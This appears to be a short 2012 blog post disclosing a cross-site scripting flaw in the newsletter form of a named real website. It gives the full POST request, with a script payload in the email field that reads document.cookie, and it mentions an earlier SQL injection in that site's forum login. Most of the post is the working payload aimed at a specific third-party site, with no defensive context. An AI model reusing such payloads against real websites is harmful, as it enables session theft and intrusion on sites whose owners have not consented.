Skip to main content

Posts

Showing posts from April, 2012

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).